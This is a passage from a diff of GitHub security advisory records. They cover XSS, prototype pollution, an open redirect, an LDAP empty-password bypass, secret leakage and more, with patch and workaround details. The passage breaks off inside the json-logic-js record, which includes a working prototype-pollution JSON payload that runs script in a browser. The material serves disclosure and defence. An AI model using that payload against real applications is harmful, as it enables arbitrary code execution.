{'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6b83ca85c8f9a6794b1f85bc70d1385ed7bc1ad07750d0977537154a@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6dfa64ecc3d67c1a71c08bfa04064549179d499f8e20a8285c57bd51@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6f51a654ac2e67e3d1c65a8957cbbb127c3f15b64b4fcd626df03633@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70f8bcccd304bd66c1aca657dbfc2bf11f73add9032571b01f1f733d@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r71da5f51ef04cb95abae560425dce9667740cbd567920f516f76efb7@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r73b5a9b677b707bbb7c1469ea746312c47838b312603bada9e382bba@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r761a52f1e214efec286ee80045d0012e955eebaa72395ad62cccbcfc@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r769411eb43dd9ef77665700deb7fc491fc3ceb532914260c90b56f2f@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r77dd041d8025a869156481d2268c67ad17121f64e31f9b4a1a220145@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7bdc83513c12db1827b79b8d57a7a0975a25d28bc6c5efe590ec1e02@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7da5ae60d7973e8894cfe92f49ecb5b47417eefab4c77cc87514d3cf@%3Cdev.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8045eedd6bb74efcd8e01130796adbab98ee4a0d1273509fb1f2077a@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r819857361f5a156e90d6d06ccf6c41026bc99030d60d0804be3a9957@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r827d17bf6900eddc686f4b6ee16fc5e52ca0070f8df7612222c40ac5@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r874688141495df766e62be095f1dfb0bf4a24ca0340d8e0215c03fab@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r87b0c69fef09277333a7e1716926d1f237d462e143a335854ddd922f@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r87d8337300a635d66f0bb838bf635cdfcbba6b92c608a7813adbf4f4@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8866f0cd2a3b319288b7eea20ac137b9f260c813d10ee2db88b65d32@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8cacf91ae1b17cc6531d20953c52fa52f6fd3191deb3383446086ab7@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8dd01541fc49d24ec223365a9974231cbd7378b749247a89b0a52210@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8fead0144bb84d8714695c43607dca9c5101aa028a431ec695882fe5@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r90b5ac6e2bf190a5297bda58c7ec76d01cd86ff050b2470fcd9f4b35@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r911c1879258ebf98bca172c0673350eb7ea6569ca1735888d4cb7adc@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r916b6542bd5b15a8a7ff8fc14a0e0331e8e3e9d682f22768ae71d775@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r93b240be16e642579ed794325bae31b040e1af896ecc12466642e19d@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r93d5e81e879120d8d87925dbdd4045cb3afa9b066f4370f60b626ce3@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9b790fe3a93121199f41258474222f15002b2f729495aa7ecbf90718@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9c010b79140452294292379183e7fe8e3533c5bb4db3f3fb39a6df61@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9cc76b98f87738791b8ec3736755f92444d3c8cb26bd4e4ffdb5c1cc@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9cd444f944241dc26d9b8b007fe8971ed7f005b56befef7a4f4fb827@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9d9b4b93df7f92cdf1147db0fc169be1776c93d1fbc63bc65721fffd@%3Cdev.knox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9f8c45a2a4540911cd8bd0485f67e8091883c9234d7a3aeb349c46c1@%3Creviews.iotdb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra1f19625cc67ac1b459c558f2ea5647d71ce51c6fe4f4cb03baec849@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra55e04d5a73afcb8383f4386e2b26832c6e3972e53827021ab885943@%3Ccommits.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra5b7313d8cc9411db6790adfba33f2cf0665cb77adb7b02043c95867@%3Cdev.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raa9c370ab42d737e93bc1795bb6a2187d7c60210cd5e3b3ce8f3c484@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rad255c736fad46135f1339408cb0147d0671e45c376c3be85ceeec1a@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rae15d73cabef55bad148e4e6449b05da95646a2a8db3fc938e858dff@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raf9c581b793c30ff8f55f2415c7bd337eb69775aae607bf9ed1b16fb@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rafb023a7c61180a1027819678eb2068b0b60cd5c2559cb8490e26c81@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb077d35f2940191daeefca0d6449cddb2e9d06bcf8f5af4da2df3ca2@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb5f2558ea2ac63633dfb04db1e8a6ea6bb1a2b8614899095e16c6233@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb69b1d7008a4b3de5ce5867e41a455693907026bc70ead06867aa323@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb7e159636b26156f6ef2b2a1a79b3ec9a026923b5456713e68f7c18e@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb81a018f83fe02c95a2138a7bb4f1e1677bd7e1fc1e7024280c2292d@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb8ad3745cb94c60d44cc369aff436eaf03dbc93112cefc86a2ed53ba@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb8c007f87dc57731a7b9a3b05364530422535b7e0bc6a0c5b68d4d55@%3Cdev.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc5a622401924fadab61e07393235838918228b3d8a1a6704295b032@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc5a8d7a0a13bc8152d427a7e9097cdeb139c6cfe111b2f00f26d16b@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbf99e4495461099cad9aa62e0164f8f25a7f97b791b4ace56e375f8d@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc1646894341450fdc4f7e96a88f5e2cf18d8004714f98aec6b831b3e@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc1d9b8e9d17749d4d2b9abaaa72c422d090315bd6bc0ae73a16abc1c@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc2e24756d28580eeac811c5c6a12012c9f424b6e5bffb89f98ee3d03@%3Cdev.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc44d1147f78496ec9932a38b28795ff4fd0c4fa6e3b6f5cc33c14d29@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc4b972ea10c5a65c6a88a6e233778718ab9af7f484affdd5e5de0cff@%3Ccommits.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc77918636d8744d50312e4f67ba2e01f47db3ec5144540df8745cb38@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc8dd95802be0cca8d7d0929c0c8484ede384ecb966b2a9dc7197b089@%3Creviews.iotdb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc9d2ab8a6c7835182f20b01104798e67c75db655c869733a0713a590@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rccedec4cfd5df6761255b71349e3b7c27ee0745bd33698a71b1775cf@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcdcf32952397c83a1d617a8c9cd5c15c98b8d0d38a607972956bde7e@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcdd56ab4255801a0964dcce3285e87f2c6994e6469e189f6836f34e3@%3Cnotifications.iotdb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcfb95a7c69c4b9c082ea1918e812dfc45aa0d1e120fd47f68251a336@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcff5caebfd535195276aaabc1b631fd55a4ff6b14e2bdfe33f18ff91@%3Creviews.iotdb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd58b60ab2e49ebf21022e59e280feb25899ff785c88f31fe314aa5b9@%3Ccommits.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd7e62e2972a41c2658f41a824b8bdd15644d80fcadc51fe7b7c855de@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdbf1cd0ab330c032f3a09b453cb6405dccc905ad53765323bddab957@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdddb4b06e86fd58a1beda132f22192af2f9b56aae8849cb3767ccd55@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rde11c433675143d8d27551c3d9e821fe1955f1551a518033d3716553@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rde782fd8e133f7e04e50c8aaa4774df524367764eb5b85bf60d96747@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re08b03cd1754b32f342664eead415af48092c630c8e3e0deba862a26@%3Ccommits.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re5706141ca397587f7ee0f500a39ccc590a41f802fc125fc135cb92f@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ree506849c4f04376793b1a3076bc017da60b8a2ef2702dc214ff826f@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/refbbb0eb65c185d1fa491cee08ac8ed32708ce3b269133a6da264317@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf00ea6376f3d0e8b8f62cf6d4a4f28b24e27193acd2c851f618aa41e@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf3bc023a7cc729aeac72f482e2eeeab9008aa6b1dadbeb3f45320cae@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfd9f102864a039f7fda64a580dfe1a342d65d7b723ca06dc9fbceb31@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe5caef1fd6cf4b8ceac1b63c33195f2908517b665c946c020d3fbd6@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe6ba83d14545e982400dea89e68b10113cb5202a3dcb558ce64842d@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rff0ad6a7dac2182421e2db2407e44fbb61a89904adfd91538f21fbf8@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/05/msg00016.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20201123-0005/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4949'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-378', 'CWE-379', 'CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-04T17:48:31Z', 'nvd_published_at': '2020-10-23T13:15:00Z'}"
+1.4.0,GHSA-58w4-w77w-qv3w,2021-01-07T22:42:05Z,2020-11-16T21:23:29Z,,['CVE-2020-26225'],Reflected XSS with parameters in PostComment,"### Impact
+An attacker could inject malicious web code into the users' web browsers by creating a malicious link.
+
+### Patches
+The problem is fixed in 4.2.0
+
+### References
+[Cross-site Scripting (XSS) - Reflected (CWE-79) ](https://cwe.mitre.org/data/definitions/79.html)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/productcomments'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/productcomments/security/advisories/GHSA-58w4-w77w-qv3w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26225'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/productcomments/commit/c56e3e9495c4a0a9c1e7dc43e1bb0fcad2796dbf'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-11-16T21:22:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vfrc-7r7c-w9mx,2022-10-20T13:52:50Z,2020-11-24T22:58:41Z,,['CVE-2020-26237'],Prototype Pollution in highlight.js,"### Impact
+
+Affected versions of this package are vulnerable to Prototype Pollution. A malicious HTML code block can be crafted that will result in prototype pollution of the base object's prototype during highlighting. If you allow users to insert custom HTML code blocks into your page/app via parsing Markdown code blocks (or similar) and do not filter the language names the user can provide you may be vulnerable.
+
+The pollution should just be harmless data but this can cause problems for applications not expecting these properties to exist and can result in strange behavior or application crashes, i.e. a potential DOS vector.
+
+_If your website or application does not render user provided data it should be unaffected._
+
+### Patches
+
+Versions 9.18.2 and 10.1.2 and newer include fixes for this vulnerability. If you are using version 7 or 8 you are encouraged to upgrade to a newer release.
+
+### Workarounds
+
+#### Patch your library
+
+Manually patch your library to create null objects for both `languages` and `aliases`:
+
+```js
+const HLJS = function(hljs) {
+ // ...
+ var languages = Object.create(null);
+ var aliases = Object.create(null);
+```
+
+#### Filter out bad data from end users:
+
+Filter the language names that users are allowed to inject into your HTML to guarantee they are valid.
+
+### References
+
+* [What is Prototype Pollution?](https://codeburst.io/what-is-prototype-pollution-49482fc4b638)
+* https://github.com/highlightjs/highlight.js/pull/2636
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+* Please file an issue against [highlight.js](https://github.com/highlightjs/highlight.js/issues/)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'highlight.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.18.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'highlight.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/highlightjs/highlight.js/security/advisories/GHSA-vfrc-7r7c-w9mx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26237'}, {'type': 'WEB', 'url': 'https://github.com/highlightjs/highlight.js/pull/2636'}, {'type': 'WEB', 'url': 'https://github.com/highlightjs/highlight.js/commit/7241013ae011a585983e176ddc0489a7a52f6bb0'}, {'type': 'PACKAGE', 'url': 'https://github.com/highlightjs/highlight.js'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/12/msg00041.html'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/highlight.js'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-471'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-11-24T22:56:50Z', 'nvd_published_at': '2020-11-24T23:15:00Z'}"
+1.4.0,GHSA-grfj-wjv9-4f9v,2021-01-07T22:40:24Z,2020-11-24T21:20:52Z,,['CVE-2020-26232'],Open redirect in Jupyter Server,"### Impact
+_What kind of vulnerability is it? Who is impacted?_
+
+Open redirect vulnerability - a maliciously crafted link to a jupyter server could redirect the browser to a different website.
+
+All jupyter servers are technically affected, however, these maliciously crafted links can only be reasonably made for known jupyter server hosts. A link to your jupyter server may *appear* safe, but ultimately redirect to a spoofed server on the public internet.
+
+This originated in jupyter/notebook: https://github.com/jupyter/notebook/security/advisories/GHSA-c7vm-f5p4-8fqh
+
+### Patches
+
+_Has the problem been patched? What versions should users upgrade to?_
+
+jupyter_server 1.0.6
+
+### References
+
+[OWASP page on open redirects](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)
+
+### For more information
+
+If you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list [security@ipython.org](mailto:security@ipython.org).
+
+Credit: zhuonan li of Alibaba Application Security Team","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'jupyter-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jupyter/jupyter_server/security/advisories/GHSA-grfj-wjv9-4f9v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26232'}, {'type': 'WEB', 'url': 'https://github.com/jupyter-server/jupyter_server/commit/3d83e49090289c431da253e2bdb8dc479cbcb157'}, {'type': 'WEB', 'url': 'https://github.com/jupyter-server/jupyter_server/blob/master/CHANGELOG.md#106---2020-11-18'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-11-24T21:10:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xwhf-g6j5-j5gc,2021-08-26T15:20:47Z,2020-11-13T17:18:29Z,,['CVE-2020-15266'],Float cast overflow undefined behavior,"### Impact
+When the `boxes` argument of `tf.image.crop_and_resize` has a very large value, the CPU kernel implementation receives it as a C++ `nan` floating point value. Attempting to operate on this is undefined behavior which later produces a segmentation fault.
+
+### Patches
+
+We have patched the issue in c0319231333f0f16e1cc75ec83660b01fedd4182 and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported in #42129","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xwhf-g6j5-j5gc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15266'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/42129'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/pull/42143/commits/3ade2efec2e90c6237de32a19680caaa3ebc2845'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-119'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-11-13T17:17:13Z', 'nvd_published_at': '2020-10-21T21:15:00Z'}"
+1.4.0,GHSA-r2j6-p67h-q639,2021-01-07T22:41:34Z,2020-11-18T21:19:14Z,,['CVE-2020-26226'],Secret disclosure when containing characters that become URI encoded,"### Impact
+
+Secrets that would normally be masked by `semantic-release` can be accidentally disclosed if they contain characters that become encoded when included in a URL.
+
+### Patches
+
+Fixed in v17.2.3
+
+### Workarounds
+
+Secrets that do not contain characters that become encoded when included in a URL are already masked properly.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'semantic-release'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '17.2.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 17.2.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/semantic-release/semantic-release/security/advisories/GHSA-r2j6-p67h-q639'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26226'}, {'type': 'WEB', 'url': 'https://github.com/semantic-release/semantic-release/commit/ca90b34c4a9333438cc4d69faeb43362bb991e5a'}]","{'cwe_ids': ['CWE-116'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-18T21:18:55Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5hmm-x8q8-w5jh,2021-01-07T22:49:18Z,2020-11-06T17:35:49Z,,['CVE-2020-26214'],LDAP authentication bypass with empty password,"### Impact
+Users may be able to bypass LDAP authentication if they provide an empty password when Alerta server is configure to use LDAP as the authorization provider.
+
+Only deployments where LDAP servers are configured to allow unauthenticated binds (eg. default on Active Directory) are affected.
+
+### Patches
+A fix has been implemented that returns HTTP 401 Unauthorized response for any authentication attempts where the password field is empty. See https://github.com/alerta/alerta/pull/1345
+
+### Workarounds
+LDAP administrators can disallow unauthenticated bind requests by clients.
+
+### References
+https://tools.ietf.org/html/rfc4513#section-5.1.2
+https://pypi.org/project/alerta-server/8.1.0/
+
+### For more information
+If you have any questions or comments about this advisory:
+* Add a comment to the issue [#1277](https://github.com/alerta/alerta/issues/1277)
+* Email us at [admin@alerta.dev](mailto:admin@alerta.dev)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'alerta-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.1.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'alerta-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.5.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/alerta/alerta/security/advisories/GHSA-5hmm-x8q8-w5jh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26214'}, {'type': 'WEB', 'url': 'https://github.com/alerta/alerta/issues/1277'}, {'type': 'WEB', 'url': 'https://github.com/alerta/alerta/pull/1345'}, {'type': 'WEB', 'url': 'https://github.com/alerta/alerta/commit/2bfa31779a4c9df2fa68fa4d0c5c909698c5ef65'}, {'type': 'WEB', 'url': 'https://pypi.org/project/alerta-server/8.1.0/'}, {'type': 'WEB', 'url': 'https://tools.ietf.org/html/rfc4513#section-5.1.2'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-06T17:34:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wpww-4jf4-4hx8,2021-01-07T22:49:25Z,2020-11-04T21:08:38Z,,['CVE-2020-15273'],"Edit feed settings and others, Cross Site Scripting(XSS) Vulnerability in Latest Release 4.4.0","baserCMS 4.4.0 and earlier is affected by Cross Site Scripting (XSS).
+
+Impact: XSS via Arbitrary script execution.
+Attack vector is: Administrator must be logged in.
+Components are: Edit feed settings, Edit widget area, Sub site new registration, New category registration
+Tested baserCMS Version : 4.4.0 (Latest)
+Affected baserCMS Version : 4.0.0 ~ 4.4.0
+Patches : https://basercms.net/security/20201029
+Found by Aquilao Null","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'baserproject/basercms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0'}, {'fixed': '4.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/security/advisories/GHSA-wpww-4jf4-4hx8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15273'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/commit/b70474ef9dcee6ad8826360884625dc7ca9041a1'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/baserproject/basercms'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-11-04T21:07:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m9hw-7xfv-wqg7,2020-11-12T19:35:53Z,2020-11-12T19:36:14Z,,[],Prototype Pollution in json-logic-js,"Versions of json-logic-js prior to 2.0.0 are vulnerable to Prototype Pollution. The method operation allows a malicious user to modify the prototype of Object through the method property name. This causes modification of any existing property that will exist on all objects and leads to Remote Code Execution.
+
+The following rule creates a popup when run from a browser:
+```
+{
+ ""method"": [
+ {
+ ""method"": [
+ {
+ ""var"": ""__proto__.constructor.is.__proto__""
+ },
+ ""constructor"",
+ [
+ ""var x = 'SECURITY!'; console.log(x, window.fetch); alert(x)""
+ ]
+ ]
+ },
+ ""call""
+ ]
+}
